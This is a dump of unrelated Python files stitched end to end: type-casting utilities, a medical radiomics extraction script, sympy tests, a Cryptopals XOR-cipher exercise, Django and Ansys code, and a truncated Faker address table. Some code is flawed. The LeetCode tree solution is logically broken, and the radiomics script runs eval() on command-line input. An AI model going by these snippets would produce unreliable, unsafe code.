data_type, cast_object) raise ValueError(f"Unsupport '{data_type}'") def cast_dataclass_object(ctx, payload, data_type, as_object): """将字典结构的数据转换为dataclass类型的对象""" if not isinstance(payload, dict): raise IncompliantError(f"The payload's type '{type(payload)}' " f"is incomplaint with dataclass {data_type}") init_kwargs = {} for field in fields(data_type): if not field.init: # 不需要包含对象初始化里的,跳过 continue field_name = field.name field_value = payload.get(field.name, MISSING) if field_value is MISSING: # 处理缺失值 if field.default is not MISSING: field_value = field.default elif field.default_factory is not MISSING: field_value = field.default_factory() else: field_value = None else: field_value = as_object(ctx, field_value, field.type) init_kwargs[field_name] = field_value return data_type(**init_kwargs) _DREALM_HINTS = "__drealm_hints__" def cast_union_object(ctx, payload, union_data_cls, cast_object): data_cls = infer_union_arg(payload, union_data_cls) return cast_object(ctx, payload, data_cls) def infer_union_arg(payload, data_cls): """infer the payload's type with union argument types""" hints = getattr(data_cls, _DREALM_HINTS, None) if hints is None: hints = build_union_hints(data_cls) setattr(data_cls, "__drealm_hints__", hints) simp_types, dobj_field_groups = hints if isinstance(payload, dict): # maybe a dataclass object for fields, owners in dobj_field_groups: if any(f in payload for f in fields): return owners[0] if isinstance(payload, dict): dict_generic_type = simp_types[1] if dict_generic_type is not None: alias_origin = get_origin(dict_generic_type) if issubclass(alias_origin, dict): return dict_generic_type elif isinstance(payload, (list, tuple)): list_generic_type = simp_types[2] if list_generic_type is not None: alias_origin = get_origin(list_generic_type) if issubclass(alias_origin, (list, tuple)): return list_generic_type else: for data_type in simp_types[0]: if isinstance(payload, data_type): return data_type raise IncompliantError(f"The payload's type '{type(payload)}' " f"is incompliant with {data_cls}") def build_union_hints(data_cls): """ build inferrence hints 推理规则: payload具有某类的专有属性则优先判断为该类 """ options = get_args(data_cls) simp_types = [] dobj_fields = {} dobj_types = [] list_type = None dict_type = None for i, cls in enumerate(options): if is_dataclass(cls): dobj_types.append(cls) for field in fields(cls): owner_idxs = dobj_fields.get(field.name) if owner_idxs is None: dobj_fields[field.name] = [i] else: owner_idxs.append(i) elif isinstance(cls, _GenericAlias): alias_origin = get_origin(cls) if isinstance(alias_origin, type): if issubclass(alias_origin, list): # List[..] if list_type is None: list_type = cls else: raise IncompliantError("Only allow one Dict type in Union") if issubclass(alias_origin, dict): # Dict[..] if dict_type is None: dict_type = cls else: raise IncompliantError("Only allow one Dict type in Union") else: simp_types.append(cls) simp_types = tuple(simp_types) if dobj_types: owner_fields = {} for field_name, owner_idxs in dobj_fields.items(): owner_idxs = tuple(owner_idxs) names = owner_fields.get(owner_idxs) if names is None: owner_fields[owner_idxs] = [field_name] else: names.append(field_name) # [(fields, owners)] 按照所属类的个数越少、出现顺序越往前排序 groups = sorted( [[tuple(f), i] for i, f in owner_fields.items()], key=lambda x: (len(x[1]), x[1]) ) groups = tuple( (fields, tuple(options[i] for i in owners)) for fields, owners in groups ) else: groups = () return (simp_types, dict_type, list_type), groups Feature_Extraction.py import argparse import os import glob import copy import csv import json import numpy as np from PIL import Image import nrrd import radiomics from radiomics import featureextractor import SimpleITK as sitk _pwd_ = os.getcwd() data_Table = {} Feature_Table = {} hyperparameters = {} hyperparameters['setting'] = {} hyperparameters['force2D'] = True hyperparameters['force2Ddimension'] = 0 def assert_paser_valid(args): assert (os.path.exists(args.input_root)), "The image root folder cannot be found" if args.Table != None: assert (os.path.exists(args.Table)), "The data table cannot be found" assert (len(args.Volume) != 0), "Input volume cannot be found" assert (len(args.Mask) != 0), "Input Mask cannot be found" assert (len(args.Mask) == len(args.Volume)), "The number of Masks is not consistent with the number of Volumes." if os.path.exists(args.output_folder) == False: os.mkdir(args.output_folder) if args.Volume[0] == 'all': assert (args.Mask[0]) == 'all', "-Mask: should be \'all\'" assert (isinstance(eval(args.width), float) or isinstance(eval(args.width), int)), "-width: should be a float/int number" assert (isinstance(eval(args.level), float) or isinstance(eval(args.level), int)), "-level: should be a float/int number" def read_data_Table(Table_path): global data_Table data_csv = open(Table_path, 'r') csv_reader = csv.reader(data_csv, delimiter = ',') for row in csv_reader: ID = row[0] data_Table[ID] = row data_csv.close() def read_data(args): global Feature_Table Vols = [] Segs = [] Folder_Vol = os.path.join(args.input_root, 'crop_vol') Folder_Seg = os.path.join(args.input_root, 'crop_msk') if args.Volume[0] == 'all': Vols = sorted( glob.glob( os.path.join(Folder_Vol, 'UC*'))) Segs = sorted( glob.glob( os.path.join(Folder_Seg, 'UC*'))) for _index_ in range(len(Vols)): ID = os.path.basename(Vols[_index_]).split('_')[0] Feature_Table[ID] = {} Feature_Table[ID]['Type'] = 'UTUC' Feature_Table[ID]['Sex'] = data_Table[ID][2] Grade_info = data_Table[ID][4] if ('High' in Grade_info or 'high' in Grade_info): Feature_Table[ID]['Histological grade'] = 'HG' elif ('Low' in Grade_info or 'low' in Grade_info): Feature_Table[ID]['Histological grade'] = 'LG' else: Feature_Table[ID]['Histological grade'] = 'None' if (data_Table[ID][6] == '' or data_Table[ID][6] == None): Feature_Table[ID]['T stage'] = 'None' elif data_Table[ID][6] == 'A': Feature_Table[ID]['T stage'] = 'a' else: Feature_Table[ID]['T stage'] = data_Table[ID][6] Feature_Table[ID]['Lymph-Invasion'] = data_Table[ID][9] Feature_Table[ID]['tumor'] = glob.glob( os.path.join(Vols[_index_], '*.tif'))[0] Feature_Table[ID]['mask'] = glob.glob( os.path.join(Segs[_index_], '*.png'))[0] else: N = len(args.Volume) for _index_ in range(N): Vol = glob.glob( os.path.join(Folder_Vol, f'{args.Volume[_index_]}*'))[0] Seg = glob.glob( os.path.join(Folder_Seg, f'{args.Mask[_index_]}*'))[0] ID = os.path.basename(Vol).split('_')[0] Feature_Table[ID] = {} Feature_Table[ID]['Type'] = 'UTUC' Feature_Table[ID]['Sex'] = data_Table[ID][2] Grade_info = data_Table[ID][4] if ('High' in Grade_info or 'high' in Grade_info): Feature_Table[ID]['Histological grade'] = 'HG' elif ('Low' in Grade_info or 'low' in Grade_info): Feature_Table[ID]['Histological grade'] = 'LG' else: Feature_Table[ID]['Histological grade'] = 'None' if (data_Table[ID][6] == '' or data_Table[ID][6] == None): Feature_Table[ID]['T stage'] = 'None' else: Feature_Table[ID]['T stage'] = data_Table[ID][6] Feature_Table[ID]['Lymph-Invasion'] = data_Table[ID][9] Feature_Table[ID]['tumor'] = glob.glob( os.path.join(Vol, '*.tif'))[0] Feature_Table[ID]['mask'] = glob.glob( os.path.join(Seg, '*.png'))[0] def Extract_features(args): import matplotlib.pyplot as plt global Feature_Table global hyperparameters args.width = eval(args.width) args.level = eval(args.level) Lower_bound = (args.level - (args.width/2)) hyperparameters['setting']['voxelArrayShift'] = Lower_bound extractor = featureextractor.RadiomicsFeatureExtractor(**hyperparameters) extractor.enableImageTypeByName('Wavelet', customArgs={'level':1}) extractor.enableImageTypeByName('Square') extractor.enableImageTypeByName('SquareRoot') extractor.enableImageTypeByName('Logarithm') extractor.enableImageTypeByName('Exponential') extractor.enableImageTypeByName('Gradient', customArgs={'gradientUseSpacing':False}) extractor.enableImageTypeByName('LBP2D', customArgs={'lbp2Dmethod':'default', 'lbp2DRadius':3, 'lbp2DSamples':36}) extractor.enableAllFeatures() for ID in Feature_Table.keys(): imageFilepath = Feature_Table[ID]['tumor'] maskFilepath = Feature_Table[ID]['mask'] img = sitk.ReadImage(imageFilepath) np_img = sitk.GetArrayFromImage(img) np_img = np_img * (args.width/65535) + Lower_bound np_img = np_img.astype(np.int) #plt.imshow(np_img, cmap='gray') #plt.show() IMG = sitk.GetImageFromArray(np_img) features = extractor.execute(IMG, maskFilepath, 255) F = {} print(f'analyzing {ID}') F['Original'] = {} F['Wavelet'] = {} F['Square'] = {} F['SquareRoot'] = {} F['Logarithm'] = {} F['Exponential'] = {} F['Gradient'] = {} F['LBP2D'] = {} for key in features.keys(): #print(f"Compute {key} : {features[key]}") if 'diagnostics' in key: continue if 'original' in key: F['Original'][key.split('original_')[1]] = float(features[key]) continue if 'wavelet' in key: F['Wavelet'][key.split('wavelet-')[1]] = float(features[key]) continue if 'square_' in key: F['Square'][key.split('square_')[1]] = float(features[key]) continue if 'squareroot_' in key: F['SquareRoot'][key.split('squareroot_')[1]] = float(features[key]) continue if 'logarithm_' in key: F['Logarithm'][key.split('logarithm_')[1]] = float(features[key]) if 'exponential' in key: F['Exponential'][key.split('exponential_')[1]] = float(features[key]) continue if 'gradient' in key: F['Gradient'][key.split('gradient_')[1]] = float(features[key]) continue if 'lbp-2D_' in key: F['LBP2D'][key.split('lbp-2D_')[1]] = float(features[key]) continue Feature_Table[ID]['Features'] = F def normalization(): NumberOfpatients = len(list(Feature_Table.keys())) base_ID = list(Feature_Table.keys())[0] F = Feature_Table[base_ID]['Features'] buffer_list = [0.0] * NumberOfpatients for _filter_ in list(F.keys()): feature_types = list(F[_filter_].keys()) for _feature_ in feature_types: _index_ = 0 _Max_ = Feature_Table[base_ID]['Features'][_filter_][_feature_] _Min_ = Feature_Table[base_ID]['Features'][_filter_][_feature_] for ID in list(Feature_Table.keys()): feature_value = Feature_Table[ID]['Features'][_filter_][_feature_] buffer_list[_index_] = feature_value print(_filter_, _feature_, feature_value, _Max_, _Min_) if feature_value > _Max_: _Max_ = feature_value if feature_value < _Min_: _Min_ = feature_value _index_ += 1 #Normalize to the range of [0, 1] offset = 0.0 if (_Max_ - _Min_) == 0: continue scale_factor = (1.0 - 0.0)/(_Max_ - _Min_) _index_ = 0 for ID in list(Feature_Table.keys()): Feature_Table[ID]['Features'][_filter_][_feature_] = (offset + scale_factor*(buffer_list[_index_] - _Min_)) _index_ += 1 def save_results(args): json_path = os.path.join(args.output_folder, 'Features.txt') json_file = open(json_path, 'w') json_content = json.dumps(Feature_Table, indent = 4) json_file.writelines(json_content) json_file.close() csv_path = os.path.join(args.output_folder, 'Features.csv') csv_file = open(csv_path, 'w') writer = csv.writer(csv_file, dialect='excel') headers = [] headers.append('Subject') first_key = list(Feature_Table.keys())[0] inner_keys = list(Feature_Table[first_key].keys()) for inner_key in inner_keys: if inner_key == 'Features': Feature_keys = list(Feature_Table[first_key][inner_key].keys()) for Feature_key in Feature_keys: _features_ = list(Feature_Table[first_key][inner_key][Feature_key].keys()) for _feature_ in _features_: headers.append(f'{Feature_key}: ' + _feature_) else: headers.append(inner_key) writer.writerow(headers) _line_ = [] print(f"We totally analyze {len(list(Feature_Table.keys()))} participants") for key in sorted(list(Feature_Table.keys())): _line_ = [] _line_.append(key) inner_keys = list(Feature_Table[key].keys()) for inner_key in inner_keys: if inner_key == 'Features': Feature_keys = list(Feature_Table[key][inner_key].keys()) for Feature_key in Feature_keys: _features_ = list(Feature_Table[first_key][inner_key][Feature_key].keys()) for _feature_ in _features_: _line_.append(Feature_Table[key][inner_key][Feature_key][_feature_]) else: _line_.append(Feature_Table[key][inner_key]) writer.writerow(_line_) csv_file.close() a = zip(*csv.reader(open(csv_path, "r"))) csv.writer(open(csv_path, "w")).writerows(a) def main(): API_description = """ ***** Radiomics Analysis Platform ***** API Name: Radiomics Feature Analysis Version: 1.0 Developer: Email: **************************************** """ parser = argparse.ArgumentParser(prog='Feature_Extraction.py', formatter_class=argparse.RawDescriptionHelpFormatter, description=API_description) parser.add_argument('-input_root', action = 'store', type = str, help = 'The absolute path to input root.') parser.add_argument('-Table', action = 'store', type = str, help = 'The absolute path to the DATA TABLE (*.csv).') parser.add_argument('-Volume', nargs = '+', help = 'ex: -Volume Vol1.tif Vol2.tif ...') parser.add_argument('-Mask', nargs = '+', help = 'ex: -Mask Msk1.png Msk2.png ...') parser.add_argument('-output_folder', action = 'store', help = 'The absolute path to the output folder used to store extracted Feature Table') parser.add_argument('-width', action = 'store', type = str, help = 'window width') parser.add_argument('-level', action = 'store', type = str, help = 'window level') parser.add_argument('-normalize', action = 'store', type = str, help = 'True/False') args = parser.parse_args() assert_paser_valid(args) read_data_Table(args.Table) read_data(args) Extract_features(args) if args.normalize == 'True': normalization() save_results(args) if __name__ == '__main__': main() import sys sys.path.append(".") import py from sympy import * from sympy.numerics import * from sympy.numerics.functions import * from sympy.numerics.quad import * def test_nintegrate(): from operator import abs # workaround abs / sympy.abs conflict Float.store() Float.setdps(20) pi_ = pi_float() assert nintegrate(lambda x: sin(x), 0, pi_).ae(2) assert nintegrate(lambda x: abs(sin(x)), 0, 10*pi_).ae(20) assert nintegrate(lambda x: sin(x), 0, 10*pi_).ae(0) assert nintegrate(lambda x: 4/(1+x**2), 0, 1).ae(pi_) assert nintegrate(lambda x: 4*sqrt(1-x**2), 0, 1).ae(pi_) Float.revert() def test_nintegrate_infinite(): Float.store() Float.setdps(15) pi_ = pi_float() assert nintegrate(lambda x: 4/(1+x**2), 1, oo).ae(pi_) A = nintegrate(lambda x: 2 * exp(-x**2), 0, oo) B = nintegrate(lambda x: 2 * exp(-x**2), -oo, 0) C = nintegrate(lambda x: 2 * exp(-x**2), -oo, oo) D = nintegrate(lambda x: 2 * exp(-x**2), 1, oo) E = nintegrate(lambda x: 2 * exp(-x**2), -1, oo) F = nintegrate(lambda x: 2 * exp(-x**2), -oo, -1) G = nintegrate(lambda x: 2 * exp(-x**2), -oo, 1) assert A.ae(pi_ ** 0.5) assert A.ae(B) assert C.ae(2*B) assert D.ae(0.27880558528066197650) assert E.ae(3.2661021165303700781) assert F.ae(D) assert G.ae(E) Float.revert() def test_tanhsinh(): Float.store() Float.setdps(15) assert nintegrate(lambda x: x**3, -3, 2, method=1).ae(-16.25) assert nintegrate(lambda x: 2/(1+x**2), -1, 1, method=1).ae(pi_float()) assert nintegrate(lambda x: 2/(1+x**2), 0, oo, method=1).ae(pi_float()) assert nintegrate(lambda x: exp(-x), 0, oo, method=1).ae(1) assert nintegrate(lambda x: 2*exp(-x**2), 0, oo, method=1).ae(sqrt(pi_float())) Float.revert() Set 1/Challenge 3/Cryptopals 01-03b.py #------------------------------------------------------------------------- # # Copyright (c) 2017, # # This software may be distributed in accordance with the MIT License. # See the accompanying LICENSE or https://opensource.org/licenses/MIT. # #------------------------------------------------------------------------- # # This code attempts to solve: https://cryptopals.com/sets/1/challenges/3. # # This version uses simple SHRDLU frequency scoring to determine the key. # The guess with the highest score _should_ produce the correct # input string and XOR key. # # No claims are made on the efficiency of this code. # # Changelog: # 2017 03 20 Initial version. # #------------------------------------------------------------------------- # Courtesy of http://www.rinkworks.com/words/letterfreq.shtml SHRDLU = { 'e': 0.1142, 'a': 0.0856, 'i': 0.0794, 'r': 0.0751, 't': 0.0746, 'o': 0.0712, 'n': 0.0641, 's': 0.0555, 'l': 0.0552, 'c': 0.0474, 'u': 0.0366, 'p': 0.0327, 'm': 0.0322, 'd': 0.0313, 'h': 0.0276, 'g': 0.0230, 'b': 0.0212, 'y': 0.0200, 'f': 0.0147, 'v': 0.0107, 'w': 0.0094, 'k': 0.0084, 'x': 0.0035, 'z': 0.0024, 'q': 0.0023, 'j': 0.0015 } #---------------------------------------------------------------------------------- def gen_guesses(bytes): len_bytes = len(bytes) guesses = { } # Assuming Latin ASCII alphabet # Constant time: 0x80 - 0x20 = 0x60 iterations # Worst case O(c * n) => c * O(n) => O(n) for key in range(0x20, 0x80): guess = [ ] score = 0 # Worst case O(n), where n = # of bytes for i in range(len_bytes): xbyte = int(bytes[i], 16) ^ key # Broad bounds for Latin ASCII alphanumericspecial chars if xbyte < 0x20 or xbyte > 0x7E: break letter = chr(xbyte).lower() if letter in SHRDLU.keys(): score += SHRDLU[letter] guess.append(letter) if len(guess) > 0 and score > 0: guesses[key] = (score, guess) return guesses #---------------------------------------------------------------------------------- def highest_score(guesses): key = 0 high = 0 for guess in guesses.keys(): score = guesses[guess][0] if score > high: key = guess high = score return key #---------------------------------------------------------------------------------- if __name__ == '__main__': input = '' input = input.decode('hex') bytes = [elem.encode('hex') for elem in input] guesses = gen_guesses(bytes) key = highest_score(guesses) print "Key: {0} | Score: {1} | String: {2}".format(hex(key), guesses[key][0], ''.join(guesses[key][1])) dacman/core/utils.py """ `dacman.core.utils` ==================================== .. currentmodule:: dacman.core.utils :platform: Unix, Mac :synopsis: Module containing several utility functions .. moduleauthor:: <> """ import yaml import os import time import hashlib import sys import logging DACMAN_STAGING_LOC = os.path.join(os.getenv('HOME'), '.dacman/data') def dump_yaml(data, filepath): with open(filepath, 'w') as f: yaml.dump(data, f, default_flow_style=False) def update_yaml(data, filepath): if os.path.exists(filepath): with open(filepath, 'r') as f: orig_data = yaml.safe_load(f) for new_val in data: if new_val in orig_data: if len(data[new_val]) > 0: for old_val in data[new_val]: orig_data[new_val][old_val] = data[new_val][old_val] else: del orig_data[new_val] else: orig_data[new_val] = data[new_val] dump_yaml(orig_data, filepath) else: dump_yaml(data, filepath) def load_yaml(yaml_file): with open(yaml_file, 'r') as f: data = yaml.safe_load(f) return data def cprint(caller, str): #print("[{}] [{}] {}".format(time.time(), caller, str)) pass def dict_to_file(data, filepath): with open(filepath, 'w') as f: for key in data: line = '{}: {}\n'.format(key, data[key]) f.write(line) def list_to_file(data, filepath): with open(filepath, 'w') as f: for elem in data: line = '{}\n'.format(elem) f.write(line) def file_to_dict(filename): dict_data = {} with open(filename) as f: lines = f.readlines() for line in lines: kv = line.split(':') key = kv[0].strip() dict_data[kv[0].strip()] = kv[1].strip() return dict_data def file_to_dict_list(filename): dict_data = {} with open(filename) as f: lines = f.readlines() for line in lines: kv = line.split(':') key = kv[0].strip() values = kv[1].split() dict_data[key] = values return dict_data def hash_comparison_id(old_path, new_path): hash = hashlib.md5('{}{}'.format(old_path, new_path).encode('utf-8')).hexdigest() return hash def get_hash_id(path): hash = hashlib.md5(path.encode('utf-8')).hexdigest() return hash def get_nfiles(path, stagingdir): scan_file = os.path.join(stagingdir, 'indexes', get_hash_id(path), 'FILEPATHS') with open(scan_file) as f: nlines = sum(1 for line in f) return nlines def dispatch_import_error(module_name, plugin_name=None, abort=None): logger = logging.getLogger(__name__) msg = f'module "{module_name}" is required' if plugin_name: msg += f' by plug-in "{plugin_name}". To enable plug-in "{plugin_name}", install the required dependencies.' logger.warn(msg) if abort: sys.exit(1) else: # this should be caught by straight.plugin raise ImportError # Generated by Django 2.1.5 on 2019-01-15 15:13 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('blogPosts', '0001_initial'), ] operations = [ migrations.AddField( model_name='blogpost', name='author', field=models.CharField(default='Author', max_length=25), ), migrations.AddField( model_name='blogpost', name='body', field=models.TextField(default='Body'), ), migrations.AddField( model_name='blogpost', name='subtitle', field=models.CharField(default='Subtitle', max_length=400), ), migrations.AlterField( model_name='blogpost', name='pub_date', field=models.DateTimeField(verbose_name='Published '), ), ] #!/usr/bin/env python ############################################################################## # Written by: <> # Date: 2009/09/27 # Description: Test accessibility of repeatbutton widget # Use the repeatbuttonframe.py wrapper script # Test the Moonlight RepeatButton sample ############################################################################## # The docstring below is used in the generated log file """ Test accessibility of repeatbutton widget """ # imports from pyatspi import * from strongwind import * from repeatbutton import * from helpers import * from sys import argv from os import path app_path = None try: app_path = argv[1] except IndexError: pass #expected # open the repeatbutton sample application try: app = launchRepeatButton(app_path) except IOError, msg: print "ERROR: %s" % msg exit(2) # make sure we got the app back if app is None: exit(4) # just an alias to make things shorter rbFrame = app.repeatButtonFrame ################ # Check Actions ################ actionsCheck(rbFrame.button, 'Button') ####################### # Check default States ####################### statesCheck(rbFrame.button, 'Button') ##################################### # Mouse click action on repeatbutton ##################################### rbFrame.button.mouseClick() sleep(config.SHORT_DELAY) #statesCheck(rbFrame.button, 'Button', add_states=['focused']) #################################### # Do Click action for repeatbutton #################################### rbFrame.keyCombo('Tab', grabFocus=False, log=False) sleep(config.SHORT_DELAY) rbFrame.button.click(log=True) sleep(config.SHORT_DELAY) statesCheck(rbFrame.button, 'Button', add_states=['focused']) rbFrame.button.click(log=True) sleep(config.SHORT_DELAY) rbFrame.button.click(log=True) sleep(config.SHORT_DELAY) assertName(rbFrame.label, 'Number of Clicks: 4') ################################### # Do Press action for repeatbutton ################################### rbFrame.press(rbFrame.button, 16) sleep(config.SHORT_DELAY) assertName(rbFrame.label, 'Number of Clicks: 20') print 'INFO: Log written to: %s' % config.OUTPUT_DIR # close application frame window quit(rbFrame) rajshrivastava/LeetCodesrc/110. Balanced Binary Tree.py # Definition for a binary tree node. # class TreeNode: # def __init__(self, val=0, left=None, right=None): # self.val = val # self.left = left # self.right = right class Solution: def isBalanced(self, root: TreeNode) -> bool: if not root: return 1 left_height = self.isBalanced(root.left) right_height = self.isBalanced(root.right) if not (left_height and right_height) or abs(left_height - right_height) > 1: return False return max(left_height, right_height) + 1 return self.isBalanced(root) 10-100 """ nodal_fraction_fc ================= """ from ansys.dpf.core.dpf_operator import Operator from ansys.dpf.core.inputs import Input, _Inputs from ansys.dpf.core.outputs import Output, _Outputs, _modify_output_spec_with_one_type from ansys.dpf.core.operators.specification import PinSpecification, Specification """Operators from Ans.Dpf.FEMutils plugin, from "averaging" category """ class nodal_fraction_fc(Operator): """Transform ElementalNodal fields into Nodal fields. Each nodal value is the fraction between the nodal difference and the nodal average. Result is computed on a given node scoping. available inputs: - fields_container (FieldsContainer) - mesh (MeshedRegion) (optional) - scoping (Scoping) (optional) - denominator (FieldsContainer) (optional) available outputs: - fields_container (FieldsContainer) Examples -------- >>> from ansys.dpf import core as dpf >>> # Instantiate operator >>> op = dpf.operators.averaging.nodal_fraction_fc() >>> # Make input connections >>> my_fields_container = dpf.FieldsContainer() >>> op.inputs.fields_container.connect(my_fields_container) >>> my_mesh = dpf.MeshedRegion() >>> op.inputs.mesh.connect(my_mesh) >>> my_scoping = dpf.Scoping() >>> op.inputs.scoping.connect(my_scoping) >>> my_denominator = dpf.FieldsContainer() >>> op.inputs.denominator.connect(my_denominator) >>> # Instantiate operator and connect inputs in one line >>> op = dpf.operators.averaging.nodal_fraction_fc(fields_container=my_fields_container,mesh=my_mesh,scoping=my_scoping,denominator=my_denominator) >>> # Get output data >>> result_fields_container = op.outputs.fields_container()""" def __init__(self, fields_container=None, mesh=None, scoping=None, denominator=None, config=None, server=None): super().__init__(name="nodal_fraction_fc", config = config, server = server) self._inputs = InputsNodalFractionFc(self) self._outputs = OutputsNodalFractionFc(self) if fields_container !=None: self.inputs.fields_container.connect(fields_container) if mesh !=None: self.inputs.mesh.connect(mesh) if scoping !=None: self.inputs.scoping.connect(scoping) if denominator !=None: self.inputs.denominator.connect(denominator) @staticmethod def _spec(): spec = Specification(description="""Transform ElementalNodal fields into Nodal fields. Each nodal value is the fraction between the nodal difference and the nodal average. Result is computed on a given node scoping.""", map_input_pin_spec={ 0 : PinSpecification(name = "fields_container", type_names=["fields_container"], optional=False, document=""""""), 1 : PinSpecification(name = "mesh", type_names=["abstract_meshed_region"], optional=True, document="""the mesh region in this pin is used to perform the averaging, if there is no field's support it is used"""), 3 : PinSpecification(name = "scoping", type_names=["scoping"], optional=True, document="""average only on these nodes, if it is scoping container, the label must correspond to the one of the fields container"""), 6 : PinSpecification(name = "denominator", type_names=["fields_container"], optional=True, document="""if a fields container is set in this pin, it is used as the denominator of the fraction instead of elemental_nodal_To_nodal_fc""")}, map_output_pin_spec={ 0 : PinSpecification(name = "fields_container", type_names=["fields_container"], optional=False, document="""""")}) return spec @staticmethod def default_config(): return Operator.default_config(name = "nodal_fraction_fc") @property def inputs(self): """Enables to connect inputs to the operator Returns -------- inputs : InputsNodalFractionFc """ return super().inputs @property def outputs(self): """Enables to get outputs of the operator by evaluationg it Returns -------- outputs : OutputsNodalFractionFc """ return super().outputs #internal name: nodal_fraction_fc #scripting name: nodal_fraction_fc class InputsNodalFractionFc(_Inputs): """Intermediate class used to connect user inputs to nodal_fraction_fc operator Examples -------- >>> from ansys.dpf import core as dpf >>> op = dpf.operators.averaging.nodal_fraction_fc() >>> my_fields_container = dpf.FieldsContainer() >>> op.inputs.fields_container.connect(my_fields_container) >>> my_mesh = dpf.MeshedRegion() >>> op.inputs.mesh.connect(my_mesh) >>> my_scoping = dpf.Scoping() >>> op.inputs.scoping.connect(my_scoping) >>> my_denominator = dpf.FieldsContainer() >>> op.inputs.denominator.connect(my_denominator) """ def __init__(self, op: Operator): super().__init__(nodal_fraction_fc._spec().inputs, op) self._fields_container = Input(nodal_fraction_fc._spec().input_pin(0), 0, op, -1) self._inputs.append(self._fields_container) self._mesh = Input(nodal_fraction_fc._spec().input_pin(1), 1, op, -1) self._inputs.append(self._mesh) self._scoping = Input(nodal_fraction_fc._spec().input_pin(3), 3, op, -1) self._inputs.append(self._scoping) self._denominator = Input(nodal_fraction_fc._spec().input_pin(6), 6, op, -1) self._inputs.append(self._denominator) @property def fields_container(self): """Allows to connect fields_container input to the operator Parameters ---------- my_fields_container : FieldsContainer, Examples -------- >>> from ansys.dpf import core as dpf >>> op = dpf.operators.averaging.nodal_fraction_fc() >>> op.inputs.fields_container.connect(my_fields_container) >>> #or >>> op.inputs.fields_container(my_fields_container) """ return self._fields_container @property def mesh(self): """Allows to connect mesh input to the operator - pindoc: the mesh region in this pin is used to perform the averaging, if there is no field's support it is used Parameters ---------- my_mesh : MeshedRegion, Examples -------- >>> from ansys.dpf import core as dpf >>> op = dpf.operators.averaging.nodal_fraction_fc() >>> op.inputs.mesh.connect(my_mesh) >>> #or >>> op.inputs.mesh(my_mesh) """ return self._mesh @property def scoping(self): """Allows to connect scoping input to the operator - pindoc: average only on these nodes, if it is scoping container, the label must correspond to the one of the fields container Parameters ---------- my_scoping : Scoping, Examples -------- >>> from ansys.dpf import core as dpf >>> op = dpf.operators.averaging.nodal_fraction_fc() >>> op.inputs.scoping.connect(my_scoping) >>> #or >>> op.inputs.scoping(my_scoping) """ return self._scoping @property def denominator(self): """Allows to connect denominator input to the operator - pindoc: if a fields container is set in this pin, it is used as the denominator of the fraction instead of elemental_nodal_To_nodal_fc Parameters ---------- my_denominator : FieldsContainer, Examples -------- >>> from ansys.dpf import core as dpf >>> op = dpf.operators.averaging.nodal_fraction_fc() >>> op.inputs.denominator.connect(my_denominator) >>> #or >>> op.inputs.denominator(my_denominator) """ return self._denominator class OutputsNodalFractionFc(_Outputs): """Intermediate class used to get outputs from nodal_fraction_fc operator Examples -------- >>> from ansys.dpf import core as dpf >>> op = dpf.operators.averaging.nodal_fraction_fc() >>> # Connect inputs : op.inputs. ... >>> result_fields_container = op.outputs.fields_container() """ def __init__(self, op: Operator): super().__init__(nodal_fraction_fc._spec().outputs, op) self._fields_container = Output(nodal_fraction_fc._spec().output_pin(0), 0, op) self._outputs.append(self._fields_container) @property def fields_container(self): """Allows to get fields_container output of the operator Returns ---------- my_fields_container : FieldsContainer, Examples -------- >>> from ansys.dpf import core as dpf >>> op = dpf.operators.averaging.nodal_fraction_fc() >>> # Connect inputs : op.inputs. ... >>> result_fields_container = op.outputs.fields_container() """ return self._fields_container jacksmith15/faker from typing import List from .. import Provider as AddressProvider def getcities(fulldict): cities = [] for cap in fulldict: for c in fulldict[cap]: cities.append(c[0]) if c[0] not in cities else cities return cities class Provider(AddressProvider): # Converted from: https://download.geonames.org/export/zip/IT.zip cap_city_province = { "67010": [["Barete", "AQ"]], "67012": [["San Giovanni", "AQ"], ["", "AQ"]], "67013": [["Mascioni", "AQ"], ["Campotosto", "AQ"], ["Ortolano", "AQ"], ["", "AQ"]], "67014": [["Capitignano", "AQ"]], "67015": [ ["", "AQ"], ["Marana", "AQ"], ["Cesaproba", "AQ"], ["Aringo", "AQ"], ["", "AQ"], ["Montereale", "AQ"], ["", "AQ"], ], "67017": [["Pizzoli", "AQ"], ["Marruci", "AQ"], ["", "AQ"]], "67019": [["", "AQ"], ["Vigliano", "AQ"], ["Scoppito", "AQ"]], "67020": [ ["", "AQ"], ["", "AQ"], ["", "AQ"], ["Castelnuovo", "AQ"], ["", "AQ"], ["Beffi", "AQ"], ["", "AQ"], ["", "AQ"], ["Calascio", "AQ"], ["Acciano", "AQ"], ["Tussio", "AQ"], ["", "AQ"], ["Navelli", "AQ"], ["Collepietro", "AQ"], ["", "AQ"], ["Civitaretenga", "AQ"], ["", "AQ"], ["", "AQ"], ["Fossa", "AQ"], ["", "AQ"], ["Fontecchio", "AQ"], ["", "AQ"], ["Roccapreturo", "AQ"], ["", "AQ"], ["", "AQ"], ["Carrufo", "AQ"], ["", "AQ"], ["Caporciano", "AQ"], ["", "AQ"], ], "67021": [["Barisciano", "AQ"], ["Picenze", "AQ"]], "67022": [["Capestrano", "AQ"]], "67023": [["", "AQ"]], "67024": [["", "AQ"]], "67025": [["Ofena", "AQ"]], "67026": [["", "AQ"]], "67027": [["Raiano", "AQ"]], "67028": [["", "AQ"]], "67029": [["Secinaro", "AQ"]], "67030": [ ["Barrea", "AQ"], ["Villalago", "AQ"], ["Alfedena", "AQ"], ["", "AQ"], ["", "AQ"], ["", "AQ"], ["Corfinio", "AQ"], ["", "AQ"], ["Cansano", "AQ"], ["", "AQ"], ["Castrovalva", "AQ"], ["Bugnara", "AQ"], ["Introdacqua", "AQ"], ["Ateleta", "AQ"], ["Scontrone", "AQ"], ["Pacentro", "AQ"], ["Vittorito", "AQ"], ["Prezza", "AQ"], ["Campo Di Fano", "AQ"], ["Cocullo", "AQ"], ["Campo Di Giove", "AQ"], ["", "AQ"], ["Roccacasale", "AQ"], ["Opi", "AQ"], ["", "AQ"], ], "67031": [["", "AQ"], ["Roccacinquemiglia", "AQ"]], "67032": [["Pescasseroli", "AQ"]], "67033": [["Pescocostanzo", "AQ"]], "67034": [["", "AQ"]], "67035": [["Bagnaturo", "AQ"], ["", "AQ"]], "67036": [["Rivisondoli", "AQ"]], "67037": [["Roccaraso", "AQ"], ["Pietransieri", "AQ"], ["Aremogna", "AQ"]], "67038": [["Scanno", "AQ"], ["", "AQ"], ["Frattura", "AQ"]], "67039": [ ["", "AQ"], ["Cavate", "AQ"], ["Albanese", "AQ"], ["Sulmona", "AQ"], 